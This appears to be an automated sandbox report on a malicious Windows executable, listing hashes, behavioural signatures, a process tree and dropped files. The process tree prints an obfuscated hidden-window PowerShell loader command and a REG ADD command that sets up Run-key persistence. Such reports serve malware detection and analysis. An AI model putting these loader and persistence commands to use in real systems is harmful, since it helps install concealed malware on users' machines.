Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/07/2024, 06:05

General

  • Target
    f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe
  • Size
    1.2MB
  • MD5
    a4c6a296a5b55a2858c0343d2c44490b
  • SHA1
    01c57919f82cf0ec9683540735141302032ac070
  • SHA256
    f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4
  • SHA512
    0bd26eb1250c24b3b0ea5938c17d71dcf9b7467fc85588e8b13978e8d06aaa6e34dd276ebb67c4455e2a8db4458d487c8bde54c7a0cf4bed2e54a323194ef13f
  • SSDEEP
    24576:PZbqxGFMhCGa7cQPHpk060aci6V20XH83oD1dEUu28KkzFu7biF8:RbqxGFMhCGa7cQkJciMvMXLFgbi2

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with a hidden display window.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe
    "C:\Users\Admin\AppData\Local\Temp\f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$galdens=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Labourhoods.Mas';$beboerhusene=$galdens.SubString(2416,3);.$beboerhusene($galdens)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Users\Admin\AppData\Local\Temp\Skankemageren.exe
        "C:\Users\Admin\AppData\Local\Temp\Skankemageren.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\Ceration48\').Openheartedness0;%sekundrfilens% ($Seismologue)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\Ceration48\').Openheartedness0;%sekundrfilens% ($Seismologue)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:2416

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Labourhoods.Mas
    Filesize
    51KB
    MD5
    edef981795fb6272025d069c64f98d9e
    SHA1
    665b7096bbd7c215bcf9c22e08e4148ae1eb7f9d
    SHA256
    f3b691cb8a7d661732bdd82f35cbe5cc2ed99fedc6992646803e871d221e9e37
    SHA512
    eff41508448d5949e79a3fa951006d28fe822364a72029f59e5f493cd9c59252dc02116c4777aeb5a2e389c075c43651e6198b713239f69f692c89aaa7ade583

  • C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Monoerne.Ple
    Filesize
    342KB
    MD5
    b75ebbcb5d2f614b0a9e050c93cdb838
    SHA1
    0ca8fd75e51890798ae01761532627d46c89ddd5
    SHA256
    08ddca57d81a3aa14a1ec07e0beede85bfb8104014d67cc8a2332be5a091abcb
    SHA512
    76fb2fde501d5d89edf279796f0ae6ef8f88dd42e07e759614f49008a46639ad848df3db5acc4e9ebd2002a7e02b6303935871a0d66f351d293229ecb4ab5371

  • \Users\Admin\AppData\Local\Temp\Skankemageren.exe
    Filesize
    1.2MB
    MD5
    a4c6a296a5b55a2858c0343d2c44490b
    SHA1
    01c57919f82cf0ec9683540735141302032ac070
    SHA256
    f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4
    SHA512
    0bd26eb1250c24b3b0ea5938c17d71dcf9b7467fc85588e8b13978e8d06aaa6e34dd276ebb67c4455e2a8db4458d487c8bde54c7a0cf4bed2e54a323194ef13f

  • memory/2812-25-0x00000000004C0000-0x0000000001522000-memory.dmp
    Filesize
    16.4MB

  • memory/2900-15-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB

  • memory/2900-12-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB

  • memory/2900-8-0x0000000074311000-0x0000000074312000-memory.dmp
    Filesize
    4KB

  • memory/2900-11-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB

  • memory/2900-17-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB

  • memory/2900-18-0x0000000006850000-0x00000000094D3000-memory.dmp
    Filesize
    44.5MB

  • memory/2900-19-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB

  • memory/2900-10-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB

  • memory/2900-9-0x0000000074310000-0x00000000748BB000-memory.dmp
    Filesize
    5.7MB